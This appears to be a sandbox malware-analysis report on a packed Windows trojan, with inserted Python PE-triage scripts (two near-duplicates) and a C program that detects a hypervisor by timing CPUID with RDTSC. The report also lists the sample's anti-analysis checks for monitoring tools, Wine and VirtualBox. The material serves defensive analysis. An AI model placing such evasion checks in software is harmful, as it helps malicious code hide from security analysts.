Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B248B0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC005A
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E32826
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00DA6834
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC69B3
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00DA1AD5
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC1AA9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EBCA68
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB7BBB
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EAF3BD
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E8E479
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00D71C74
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC3429
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB440C
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB0D74
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB6540
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00D87EA8
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00DACE02
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00F607E4
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EBAFC4
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00B04A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: vxwrnjjb ZLIB complexity 0.9949987173152934
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B23A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B1CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\AV4ZTEY7.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 39%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1789952 > 1048576
Source: file.exe | Static PE information: Raw size of vxwrnjjb is bigger than: 0x100000 < 0x19b200

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 1.2.file.exe.b00000.0.unpack
  section rights after unpacking: (unnamed):EW; .rsrc:W; .idata:W; (unnamed):EW; vxwrnjjb:EW; aqjwqyrz:EW; .taggant:EW
  section rights on disk:         (unnamed):ER; .rsrc:W; .idata:W; (unnamed):EW; vxwrnjjb:EW; aqjwqyrz:EW; .taggant:EW
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B26390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1b8f86 should be: 0x1c3a22
Source: file.exe | Static PE information: section name: (empty name as extracted)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty name as extracted)
Source: file.exe | Static PE information: section name: vxwrnjjb
Source: file.exe | Static PE information: section name: aqjwqyrz
Source: file.exe | Static PE information: section name: .taggant
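The static findings in this section (non-standard and empty section names, an entry point in .taggant rather than the code section, a stored checksum that does not match the recomputed one, a ZLIB complexity of 0.99 for vxwrnjjb) can all be reproduced from the PE headers with the standard library. The following is an added example, not Joe Sandbox code: the sample itself is not embedded, so build_demo_pe() constructs a two-section PE32 with the same shape (a plain .text plus a high-entropy section with an arbitrary name that owns the entry point). The 7.0 bits/byte entropy threshold, the list of "standard" section names and the constructed file are this example's own choices; the checksum routine is the algorithm imagehlp's CheckSumMappedFile uses.

```python
"""Static PE triage: section names, entry point section, CheckSum, entropy.

Added example (stdlib only). build_demo_pe() is a constructed file that mimics
the report's layout; it is not the analysed sample.
"""
import math
import struct
from collections import Counter, namedtuple

Section = namedtuple("Section", "name va vsize raw_ptr raw_size")
CODE_SECTIONS = {".text", "CODE"}
# Assumed "usual" names; anything else (or an empty/unprintable name) is flagged.
STANDARD_NAMES = CODE_SECTIONS | {".rdata", ".data", ".idata", ".edata",
                                  ".rsrc", ".reloc", ".bss", ".tls", ".pdata"}


def parse_pe32(data):
    """Return (CheckSum field offset, entry point RVA, stored CheckSum, sections)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]        # FileHeader.NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]   # FileHeader.SizeOfOptionalHeader
    opt = e_lfanew + 24                                           # IMAGE_OPTIONAL_HEADER32
    entry = struct.unpack_from("<I", data, opt + 16)[0]           # AddressOfEntryPoint
    checksum_off = opt + 64                                       # CheckSum
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    sections = []
    for i in range(nsec):   # IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append(Section(f[0].rstrip(b"\0").decode("latin-1"), f[2], f[1], f[4], f[3]))
    return checksum_off, entry, stored, sections


def pe_checksum(data, checksum_off):
    """Fold every 32-bit word (CheckSum field excluded) into 16 bits with
    end-around carry, then add the file length: the imagehlp algorithm."""
    total, top = 0, 1 << 32
    for off in range(0, len(data) - len(data) % 4, 4):
        if off == checksum_off:
            continue
        total += struct.unpack_from("<I", data, off)[0]
        if total >= top:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    rem = len(data) % 4
    if rem:  # zero-pad a trailing partial word
        total += struct.unpack("<I", bytes(data[-rem:]) + b"\0" * (4 - rem))[0]
        if total >= top:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def entropy(buf):
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform."""
    n = len(buf)
    return 0.0 if n == 0 else -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def static_triage(data):
    checksum_off, entry, stored, sections = parse_pe32(data)
    report = {"checksum_ok": stored == pe_checksum(data, checksum_off),
              "odd_names": [], "packed": [], "entry_section": None}
    for s in sections:
        if not s.name or not s.name.isprintable() or s.name not in STANDARD_NAMES:
            report["odd_names"].append(s.name)
        if s.raw_size and entropy(data[s.raw_ptr:s.raw_ptr + s.raw_size]) > 7.0:
            report["packed"].append(s.name)          # compressed or encrypted payload
        if s.va <= entry < s.va + max(s.vsize, s.raw_size):
            report["entry_section"] = s.name
    report["entry_outside_code"] = report["entry_section"] not in CODE_SECTIONS
    return report


def build_demo_pe(checksum=None):
    """Constructed PE32 (not the real sample). checksum=None stores the correct
    value; pass an integer to plant a wrong one, as the sample has."""
    text = b"\x90" * 0x200                 # all NOPs: entropy 0
    blob = bytes(range(256)) * 4           # every byte value equally often: entropy 8
    sec_hdrs, body, raw_ptr = b"", b"", 0x200
    for name, va, raw in ((b".text", 0x1000, text), (b"vxwrnjjb", 0x2000, blob)):
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, len(raw), va, len(raw), raw_ptr, 0, 0, 0, 0, 0x60000020)
        raw_ptr += len(raw)
        body += raw
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                  # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)   # i386, 2 sections, 224-byte optional header
    opt = struct.pack("<HBB IIIIIIIII HHHHHH IIII HH IIIIII", 0x10B, 14, 0,
                      len(text), len(blob), 0, 0x2010, 0x1000, 0x2000, 0x400000, 0x1000, 0x200,
                      6, 0, 0, 0, 6, 0, 0, 0x3000, 0x200, 0, 2, 0x8140,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128   # entry 0x2010, 16 empty directories
    data = bytearray((dos + b"PE\0\0" + file_hdr + opt + sec_hdrs).ljust(0x200, b"\0") + body)
    off = 0x40 + 24 + 64
    struct.pack_into("<I", data, off, pe_checksum(data, off) if checksum is None else checksum)
    return bytes(data)


if __name__ == "__main__":
    print(static_triage(build_demo_pe()))
    print(static_triage(build_demo_pe(checksum=0x1B8F86)))
```

Run against the real file.exe, parse_pe32 would list the two unnamed sections, vxwrnjjb, aqjwqyrz and .taggant as odd names, place the entry point in .taggant, and report the checksum mismatch the sandbox printed; a wrong CheckSum is harmless to the loader for a user-mode executable, which is why packers rarely bother to fix it and why it is a cheap static signal.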
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00F390E0 push ebx; mov dword ptr [esp], 56D087C3h (at 1_2_00F39124)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00F368EF push ecx; mov dword ptr [esp], ebx (at 1_2_00F36A3B)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00F368EF push 64E87815h; mov dword ptr [esp], ecx (at 1_2_00F36A6A)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00F368EF push 0958F400h; mov dword ptr [esp], esi (at 1_2_00F36A83)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00F368EF push 598A51CCh; mov dword ptr [esp], eax (at 1_2_00F36AEA)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00F368EF push 5618F227h; mov dword ptr [esp], edi (at 1_2_00F36B18)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B27895 push ecx; ret (at 1_2_00B278A8)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EF20D5 push ebx; mov dword ptr [esp], esi (at 1_2_00EF2477)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push ebx; mov dword ptr [esp], 510481D1h (at 1_2_00EB28C9)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push 1751558Dh; mov dword ptr [esp], eax (at 1_2_00EB29BF)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push 4FB38305h; mov dword ptr [esp], edx (at 1_2_00EB2A0E)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push ecx; mov dword ptr [esp], 4984A13Fh (at 1_2_00EB2A37)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push 26E30640h; mov dword ptr [esp], ebp (at 1_2_00EB2ABF)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push ebp; mov dword ptr [esp], esi (at 1_2_00EB2AC3)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push ebx; mov dword ptr [esp], edi (at 1_2_00EB2C06)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push 6291891Ah; mov dword ptr [esp], ebx (at 1_2_00EB2CBA)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push 72070B80h; mov dword ptr [esp], esi (at 1_2_00EB2CC5)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push ebx; mov dword ptr [esp], 6DD9B895h (at 1_2_00EB2D39)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push ebp; mov dword ptr [esp], 2E7F4AF6h (at 1_2_00EB2D71)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push edi; mov dword ptr [esp], 2E5C72AEh (at 1_2_00EB2D8B)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push 4CCC83ABh; mov dword ptr [esp], ebp (at 1_2_00EB2E05)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push edx; mov dword ptr [esp], ebp (at 1_2_00EB2E68)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push edi; mov dword ptr [esp], ebp (at 1_2_00EB2EBE)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push 3B82BC07h; mov dword ptr [esp], esi (at 1_2_00EB2EFA)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB28AE push edi; mov dword ptr [esp], ecx (at 1_2_00EB2F30)
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push 5483F852h; mov dword ptr [esp], ebp1_2_00EB2F75
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push ebx; mov dword ptr [esp], 3AA67757h1_2_00EB2F8F
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push ecx; mov dword ptr [esp], edx1_2_00EB300F
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push ecx; mov dword ptr [esp], ebp1_2_00EB3031
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push edx; mov dword ptr [esp], 6386EFA3h1_2_00EB30DF
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push edi; mov dword ptr [esp], 59FF1181h1_2_00EB30EA
              Source: file.exeStatic PE information: section name: vxwrnjjb entropy: 7.9545182277365285
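The static indicators above (entry point in the non-standard .taggant section, section names that are blank or random like vxwrnjjb, a stored checksum that differs from the one computed over the file, and a section with entropy close to 8.0) are the standard fingerprint of a packed sample. The following is an added example, not Joe Sandbox's or the sample's code, that reproduces those four checks on any PE; `build_fake_pe()` constructs a synthetic PE32 image so it runs offline, and the 7.2 entropy threshold and the list of "standard" code section names are assumptions, not values taken from the report.

```python
"""Static PE triage: entry-point section, odd section names, checksum, entropy.
Added example for this report, not Joe Sandbox or sample code."""
import math
import struct
from typing import Dict, List, Tuple

# Sections where an entry point is normally expected (MSVC, MinGW, Delphi names).
STANDARD_CODE_SECTIONS = {".text", ".code", "CODE", ".itext"}
PACKED_ENTROPY_THRESHOLD = 7.2  # assumption: common triage cut-off, not from the report


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 means every byte value is equally frequent (packed/encrypted)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE image checksum: 16-bit word sum with carry folding, skipping the 4-byte
    CheckSum field itself, plus the file length (the CheckSumMappedFile algorithm)."""
    total, n = 0, len(data)
    for i in range(0, n & ~1, 2):
        if i == checksum_offset or i == checksum_offset + 2:
            continue
        total += struct.unpack_from("<H", data, i)[0]
        total = (total & 0xFFFF) + (total >> 16)
    if n & 1:  # odd trailing byte counts as the low byte of a final word
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total + n) & 0xFFFFFFFF


def parse_sections(data: bytes) -> List[Dict]:
    """Walk the section table; 40-byte IMAGE_SECTION_HEADER entries."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        raw_name = data[off:off + 8].rstrip(b"\0")
        vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({
            "name": raw_name.decode("latin-1"),
            # blank or non-printable names show up as empty "section name:" rows in the report
            "printable": bool(raw_name) and all(0x21 <= c <= 0x7E for c in raw_name),
            "vaddr": vaddr, "vsize": vsize, "raw_ptr": raw_ptr, "raw_size": raw_size,
            "entropy": shannon_entropy(data[raw_ptr:raw_ptr + raw_size]),
        })
    return sections


def triage(data: bytes) -> Dict:
    """Summarise the packer indicators the report lists for file.exe on any PE."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    opt = e_lfanew + 24                  # optional header follows the 20-byte COFF header
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    checksum_off = opt + 64              # same offset for PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    sections = parse_sections(data)
    entry_sec = next((s for s in sections if s["vaddr"] <= entry_rva
                      < s["vaddr"] + max(s["vsize"], s["raw_size"])), None)
    computed = pe_checksum(data, checksum_off)
    return {
        "sections": [s["name"] for s in sections],
        "entry_point_section": entry_sec["name"] if entry_sec else None,
        "entry_point_in_standard_section": bool(entry_sec) and entry_sec["name"] in STANDARD_CODE_SECTIONS,
        "odd_section_names": [s["name"] for s in sections if not s["printable"]],
        "high_entropy_sections": [s["name"] for s in sections if s["entropy"] >= PACKED_ENTROPY_THRESHOLD],
        "checksum_stored": stored,
        "checksum_computed": computed,
        # zero is common for unsigned binaries; a non-zero mismatch (the report's
        # "real checksum ... should be" pair) means the image was modified after linking
        "checksum_matches": stored == computed,
    }


def build_fake_pe(sections: List[Tuple[bytes, bytes]], entry_rva: int) -> bytes:
    """Constructed minimal PE32 image for testing (not a real sample): DOS header,
    COFF header, zeroed optional header, section table, 0x200-aligned bodies."""
    file_align, e_lfanew, opt_size = 0x200, 0x40, 0xE0
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    optional = bytearray(opt_size)
    struct.pack_into("<H", optional, 0, 0x10B)          # PE32 magic
    struct.pack_into("<I", optional, 16, entry_rva)     # AddressOfEntryPoint
    table, bodies, raw_ptr = b"", b"", file_align
    for i, (name, body) in enumerate(sections):
        raw_size = -(-len(body) // file_align) * file_align
        table += name.ljust(8, b"\0")[:8] + struct.pack("<IIII", len(body), 0x1000 * (i + 1), raw_size, raw_ptr) + b"\0" * 16
        bodies += body.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    headers = dos + coff + bytes(optional) + table
    assert len(headers) <= file_align, "too many sections for this toy layout"
    return headers.ljust(file_align, b"\0") + bodies
```

Run `triage(open("file.exe", "rb").read())` on a real sample; the report's combination (entry point in .taggant, two unprintable names, entropy 7.95 in vxwrnjjb, checksum mismatch) will show up as `entry_point_in_standard_section == False`, two `odd_section_names`, one `high_entropy_sections` entry and `checksum_matches == False`. Entropy alone is a weak signal (resource-heavy or compressed-data binaries also score high); it is the co-occurrence that matters.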

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B26390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 1_2_00B26390

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_1-25663
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
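The RDTSC interceptor entries in this section each record one pair of `rdtsc` reads; the earlier edx:eax value is pushed, padded with junk (`pushad`/`popad`, `push`/`pop` of the same register, conditional jumps that never fire) and popped again before the second read, so the sample is measuring how many cycles elapse across a small stretch of code. The following is an added example, not the sample's code (which is obfuscated and cannot be reconstructed from the report) and not Joe Sandbox's interceptor: it shows the underlying timing probe in plain form, using `cpuid` as the instruction to time because it forces a VM exit under most hypervisors. It assumes an x86 host with GCC or Clang for `__rdtsc` and `__cpuid`, falls back to `clock_gettime` elsewhere so it compiles everywhere, and the 1000-tick threshold in `main` is an assumption, not a value from the report.

```c
/* Added example: the timing probe behind "RDTSC instruction interceptor" hits,
 * with the obfuscation stripped away. Not code from the sample or from Joe Sandbox. */
#include <stdint.h>
#include <stdio.h>
#include <time.h>

#if defined(__x86_64__) || defined(__i386__)
#include <cpuid.h>
#include <x86intrin.h>
static uint64_t read_tsc(void) { return __rdtsc(); }
static void serialize(void) {
    unsigned a, b, c, d;
    __cpuid(0, a, b, c, d);   /* CPUID is intercepted by hypervisors: a VM exit costs thousands of cycles */
}
#else
/* Assumption: non-x86 build host; use a monotonic clock so the example still compiles and runs. */
static uint64_t read_tsc(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
static void serialize(void) {
    volatile unsigned sink = 0;
    for (unsigned i = 0; i < 1000; i++) sink += i;
}
#endif

/* One sample: tick delta across the serializing instruction. */
uint64_t tsc_delta_sample(void) {
    uint64_t t0 = read_tsc();
    serialize();
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

/* Minimum over several samples; a single sample is dominated by interrupts,
 * frequency scaling and, in the sandbox, by the interceptor itself. */
uint64_t tsc_delta_min(int samples) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < samples; i++) {
        uint64_t d = tsc_delta_sample();
        if (d < best) best = d;
    }
    return best;
}

/* The decision: bare-metal CPUID costs on the order of 100-200 cycles, a VM exit
 * far more. The threshold is the fragile part, which is why sandboxes can defeat
 * the check by offsetting or virtualising the TSC (what the interceptor does). */
int delta_suggests_hypervisor(uint64_t delta, uint64_t threshold) {
    return delta > threshold;
}

int main(void) {
    uint64_t d = tsc_delta_min(50);
    printf("min delta across CPUID: %llu ticks -> %s\n", (unsigned long long)d,
           delta_suggests_hypervisor(d, 1000) ? "likely virtualized" : "looks like bare metal");
    return 0;
}
```

Run it once on a physical machine and once inside the analysis VM: the gap between the two minima is what the sample relies on, and the sandbox's interceptor works by rewriting the second read so that gap disappears. The junk instructions in the report's listings do not change the measurement; they only keep signature-based detection from matching a clean `rdtsc; ...; rdtsc; sub` sequence.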
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5011C second address: D50126 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D50126 second address: D5012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EB3EF0 second address: EB3EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECAD86 second address: ECADB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6E390E37F2h 0x0000000f pop eax 0x00000010 push edi 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECADB8 second address: ECADBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECADBE second address: ECADC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECADC7 second address: ECADCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECADCD second address: ECADD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECAF28 second address: ECAF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6E3947E056h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECD9F8 second address: ECD9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECD9FC second address: ECDA99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F6E3947E069h 0x0000000d pushad 0x0000000e jmp 00007F6E3947E064h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 sub dx, 8164h 0x0000001d jg 00007F6E3947E065h 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F6E3947E058h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f call 00007F6E3947E059h 0x00000044 pushad 0x00000045 pushad 0x00000046 jmp 00007F6E3947E064h 0x0000004b jg 00007F6E3947E056h 0x00000051 popad 0x00000052 push esi 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECDA99 second address: ECDAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F6E390E37E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ECDAA9 second address: ECDAAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
